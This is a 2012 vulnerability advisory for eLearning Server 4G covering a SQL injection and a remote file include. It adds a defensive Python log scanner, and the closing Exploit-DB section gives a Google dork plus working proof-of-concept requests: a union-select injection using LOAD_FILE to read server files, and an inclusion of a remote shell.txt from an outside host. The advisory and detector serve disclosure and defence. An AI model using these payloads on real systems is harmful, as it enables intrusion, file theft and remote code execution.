Vendor: eLearning Server
By: Eugene Salov, Andrey Komarov
CVSS: 7.5 (HIGH)
CWE: 89, 98 (SQL Injection, Remote File Include)
Product Name: eLearning Server
Affected Version From: 4G
Affected Version To: 4G
Patch Exists: YES
Related CVE: CVE-2012-2245, CVE-2012-2246
CPE: a:hypermethod:elearning_server
Platforms Tested: Microsoft Windows
Year: 2012

eLearning Server Multiple Remote Vulnerabilities

The news.php4 script is vulnerable to SQL injection through the 'nid' parameter. An attacker can use this vulnerability to execute arbitrary SQL commands on the underlying database.

The admin/setup.inc.php script is vulnerable to remote file inclusion. An attacker can use this vulnerability to include a remote file containing malicious code and execute it on the vulnerable server.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Remote file include vulnerabilities should be prevented by restricting access to the vulnerable script.
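
The following is an added example, not part of the original advisory or the vendor's code: a Python check that scans web server access logs for the two request shapes this advisory describes, a non-numeric 'nid' on news.php4 and a URL in the 'path' parameter of admin/setup.inc.php. The combined log format, the treatment of 'nid' as a numeric ID, and the sample log lines are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Matches values such as http://host/..., ftp://host/... or //host/...
URL_SCHEME_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:)?//', re.IGNORECASE)

def classify(target):
    """Return the findings for one request target (path plus query string)."""
    parts = urlsplit(target)
    path = parts.path.lower()
    params = parse_qs(parts.query, keep_blank_values=True)  # also URL-decodes values
    findings = []
    # news.php4: 'nid' is assumed to be a numeric ID, so anything else is flagged.
    if path.endswith("/news.php4"):
        for value in params.get("nid", []):
            if not re.fullmatch(r"\d+", value):
                findings.append("nid-not-numeric")
    # admin/setup.inc.php: a 'path' value that is a URL refers to remote content.
    if path.endswith("/admin/setup.inc.php"):
        for value in params.get("path", []):
            if URL_SCHEME_RE.match(value):
                findings.append("path-is-url")
    return findings

def scan(lines):
    """Yield (line_number, findings) for each log line with at least one finding."""
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match:
            findings = classify(match.group(1))
            if findings:
                yield number, findings

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/May/2012:10:00:01 +0000] "GET /news.php4?nid=12 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [10/May/2012:10:00:07 +0000] "GET /news.php4?nid=-1%27+union+select+1,2 HTTP/1.1" 200 812',
    '198.51.100.7 - - [10/May/2012:10:00:09 +0000] "GET /admin/setup.inc.php?path=http://files.example.invalid/a.txt HTTP/1.1" 200 64',
    '192.0.2.10 - - [10/May/2012:10:00:15 +0000] "GET /index.php HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, findings)
```
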

Exploit-DB raw data:

# Exploit Title: eLearning Server Multiple Remote Vulnerabilities
# Google Dork: intitle:"eLearning Server"
# Date: 10.05.2012
# Author: Eugene Salov, Andrey Komarov (Group-IB, http://group-ib.ru)
# Software Link: http://www.hypermethod.ru/
# Version: 4G
# Tested on: Microsoft Windows

news.php4 "nid" SQL injection:
POC:
/news.php4?nid=-12'+union+select+1,2,LOAD_FILE('C:\\Program%20Files\\Hypermethod\\eLearningServer\\index.php'),4,5,6,7,8,9,10,11/*

admin/setup.inc.php Remote file Include
POC: /admin/setup.inc.php?path=http://group-ib.ru/shell.txt?